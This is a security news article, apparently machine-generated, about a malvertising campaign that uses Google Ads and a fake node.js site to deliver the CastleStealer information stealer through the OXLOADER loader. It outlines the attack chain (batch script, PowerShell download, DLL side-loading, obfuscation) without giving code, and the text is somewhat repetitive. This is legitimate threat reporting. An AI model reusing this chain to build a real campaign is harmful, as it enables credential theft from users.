Ethical Hacking News
Researchers have uncovered a new campaign that uses malicious Google Ads to deliver the CastleStealer malware, exploiting multiple layers of obfuscation to evade detection. The threat actor is believed to be a Russian-speaking entity with financial motivations.
The new campaign leverages malicious Google Ads to deliver a highly sophisticated piece of malware called CastleStealer. The malware uses OXLOADER, a previously unreported malware loader, which is capable of executing the CastleStealer payload with great precision and stealth. The threat actor behind this campaign is likely a Russian-speaking entity with a financial motivation for their actions. The attack begins when an unsuspecting user enters a query on Google, triggering a fake website that displays malicious advertisements. CastleStealer is a .NET information stealer that can steal sensitive information from unsuspecting users.
The world of cybersecurity is constantly evolving, and it's becoming increasingly difficult for even the most seasoned experts to keep up with the latest threats. Recently, a new campaign has been uncovered that leverages malicious Google Ads as a means to deliver a highly sophisticated piece of malware known as CastleStealer. This malicious software (malware) is designed to steal sensitive information from unsuspecting users, making it an extremely concerning threat.
The campaign in question involves the use of a previously unreported malware loader called OXLOADER, which is capable of executing the CastleStealer payload with great precision and stealth. Researchers have determined that this malware loader is highly engineered, utilizing multiple obfuscation layers to evade detection by traditional security software.
According to Elastic Security Labs, the threat actor behind this campaign is likely a Russian-speaking entity with a financial motivation for their actions. This conclusion was drawn from the fact that explicit exclusions were made to prevent the malware from infecting machines located in certain regions of the Commonwealth of Independent States (CIS). Furthermore, researchers have identified the use of unique staging techniques and anti-VM measures, which suggest deliberate engineering choices aimed at evading analysis.
The attack begins when an unsuspecting user enters a query such as "lts version of node.js" on Google. The result is redirected to a fake website ("node-js[.]prentiva99[.]info") presented under the name "ВОЛОДИМИР ТЕРЕЩЕНКО," purportedly based in Ukraine. This setup serves as a front for malicious advertisements that, upon clicking, trigger the execution of a batch script hosted on Storj—a decentralized, open-source cloud storage platform.
This batch script then proceeds to display a bogus installation wizard user interface while stealthily downloading and executing OXLOADER via PowerShell commands, which triggers a Windows User Account Control (UAC) prompt. The attack takes advantage of DLL side-loading to launch a rogue DLL that decrypts and executes the CastleStealer payload, leveraging control-flow flattening (CFF) and mixed Boolean-Arithmetic (MBA) techniques to evade static detection.
CastleStealer is a .NET information stealer recently distributed alongside CastleLoader through a ClickFix-style lure masquerading as a free image-editing tool. The engineering behind OXLOADER suggests that the family of malware is worth monitoring, given its ability to utilize complex obfuscation layers and unique staging techniques to evade analysis.
It's essential for users and organizations alike to be vigilant in this current threat landscape. By staying informed about emerging threats like CastleStealer and understanding how they operate can help mitigate the risks associated with their deployment.
Related Information:
https://www.ethicalhackingnews.com/articles/New-OXLOADER-Loader-Exploits-Malicious-Google-Ads-to-Deliver-CastleStealer-Malware-ehn.shtml
https://thehackernews.com/2026/06/new-oxloader-loader-uses-malicious.html
Published: Mon Jun 22 08:31:51 2026 by llama3.2 3B Q4_K_M
